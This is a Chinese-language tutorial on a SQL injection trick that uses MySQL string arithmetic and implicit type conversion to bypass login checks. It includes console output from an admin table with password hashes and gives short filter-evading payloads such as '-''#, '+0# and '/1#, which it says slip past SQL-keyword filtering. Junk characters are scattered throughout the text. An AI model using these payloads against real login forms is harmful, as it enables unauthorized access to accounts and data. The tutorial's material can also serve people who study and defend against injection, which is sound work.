使用MySQL字符串运算实施精巧化SQL注入攻击

admin

我们先来看这样一个场景。 有以下表结构： , c  B6 ~$ @7 O- n& N + d  P3 x. j9 k$ i, mmysql> desc admin; +----------+--------------+------+-----+---------+----------------+ 5 Y8 o1 d! ^. f1 K8 I: v| Field    | Type         | Null | Key | Default | Extra          | * V- D6 X* g" s* U% B" t/ q+----------+--------------+------+-----+---------+----------------+ % X5 ^0 v5 ^, ?& z7 r$ z| id       | mediumint(9) | NO   | PRI | NULL    | auto_increment | | name     | char(32)     | NO   | UNI | NULL    |                | | password | char(32)     | NO   | UNI | NULL    |                | * l" U+ p: _4 D% s) {+----------+--------------+------+-----+---------+----------------+ * y. p, T& x0 h0 e8 c; Q6 [; |( x4 @! i3 rows in set (0.00 sec) 执行select * from admin;，成功返回所有记录内容。 % ?$ O/ W2 V: W* | +----+--------+----------------------------------+ 3 c0 g# S6 u9 P5 e: e, J| id | name   | password                         | , S3 Y& I. f$ g* p+----+--------+----------------------------------+ |  1 | admin  | c6dabaeeb05f2bf8690bab15e3afb022 | * F. v, o* l( }: l|  2 | pnig0s | 998976f44e2a668k5dc21e54b3401645 | |  4 | n00b   | ff80e8508d39047460921792273533a4 | +----+--------+----------------------------------+ 3 rows in set (0.00 sec) 执行select * from admin where name=”;，没有匹配到任何记录。 $ Q8 K9 H, ~2 s8 K8 E. |# ?) Wmysql> select * from admin where name = ''; & U. y3 D8 H. Z' ~6 Z# g$ e4 nEmpty set (0.00 sec) 那么我们来执行select * from admin where name = ”-”; +----+--------+----------------------------------+ | id | name   | password                         | +----+--------+----------------------------------+ - h, L1 c" \' F# i|  1 | admin  | c6dabaeeb05f2bf8690bab15e3afb022 | |  2 | pnig0s | 998976f44e2a668k5dc21e54b3401645 | 0 ~  p5 V- h- H- I/ ?" \|  4 | n00b   | ff80e8508d39047460921792273533a4 | / w- |: G" D9 x+----+--------+----------------------------------+ 3 rows in set, 3 warnings (0.00 sec) 可以看到，也成功返回了所有记录，但是有三个warnings，我们看下警告信息： ' f) A: g/ p( U mysql> show warnings; 2 i5 y% D9 }% ]' J$ Q2 Q9 y- X0 [1 Z+---------+------+------------------------------------------ . G6 E0 w& R; [" ]| Level   | Code | Message 3 ~4 p; z2 Q: O: _( C; x) H+---------+------+------------------------------------------ | Warning | 1292 | Truncated incorrect DOUBLE value: 'admin | Warning | 1292 | Truncated incorrect DOUBLE value: 'pnig0s | Warning | 1292 | Truncated incorrect DOUBLE value: 'n00b +---------+------+------------------------------------------ 3 rows in set (0.00 sec) 1 h4 j7 Z" g, [8 F提示截断了错误的DOUBLE值’admin等等，当在一个字符串类型的列中使用数字类型的值时会产生这类警告。 我们单独执行select ”-”;看下结果。 + f$ w/ P8 ~2 \6 [6 ]# Q" F mysql> select ''-''; 7 Y) f, m2 Q( J/ d  ^. J+-------+ | ''-'' | ; }* D1 `3 U, Q; m6 a+-------+ |     0 | +-------+ 1 row in set (0.00 sec) 返回0，也就是说我们查询的每一行的name子段都会和0做对比，这样就会触发一个类型转换，对name字段转换的结果也必然为0： 1 }, x7 `% P- ~( O1 o3 \mysql> select CAST((select name from admin limit 1,1) as DECIMAL); 1 j* I7 H# j2 D% `+-----------------------------------------------------+ | CAST((select name from admin limit 1,1) as DECIMAL) | +-----------------------------------------------------+ |                                                   0 | & k: `: h" `6 q6 W6 l0 d4 a+-----------------------------------------------------+ 1 row in set, 1 warning (0.00 sec) 3 j5 s" T' [4 z3 ]! U7 I9 x% T& \9 A因此where语句构成了相等的条件，where 0=”=”，记录被返回。 ! i" \# S9 a8 l6 o/ G+ z/ S SQL注入场景: http://www.sqlzoo.net/hack/ 7 @. d1 C8 _" e/ C - G6 i. L0 O4 o8 L4 Q" C8 q如果我们想绕过登录验证，上面已经给出了一个传统的tips：用户名密码均为’ or ”=’ 这样的逻辑和绕过方式很常见，这里不再具体解释了。 : D' q" Q0 C$ |7 G& @+ D8 n* o/ @& \ 那么通过这次发现的技巧，可以使用一种相当精巧的方式，且避免使用SQL关键字，来绕过登录。 7 U! {  s) T% J8 _# M0 l: {: W 仅仅在name子段输入’-”#，password留空，即可绕过登录验证。 " A3 T) Y7 t/ E8 K 1 K+ R7 t; _$ Z    2 B  [% s& F& R2 a9 D除了”-”，其他运算符”+”,”*”,”^”都会有同样的效果。 再继续进行测试，我们发现只要在闭合单引号的情况系构造查询结果为0的条件即可 mysql> select ''/1; +------+ 4 m) g& m+ t% l0 l9 t. U; f$ ~8 O$ \/ m| ''/1 | ; \* C# R) w+ |& G2 @: r& h, ?+------+ |    0 | +------+ ) z; p# H5 U; u- p$ f/ Y+ U1 row in set (0.00 sec) 0 ~! q( w$ Y+ [6 b5 A" W类似的”+0,”-0,”*0,”^0均可。 那么刚才的注入环境我们使用以下的精简payload同样可以绕过登录认证： ‘+0#，’/1#，’^0，’-0#等等。   0 m& U; `6 _# W/ G$ y 利用这样一种特性，当目标对注入语句中的SQL关键字进行过滤时，便可通过这样一种方式进行Bypass。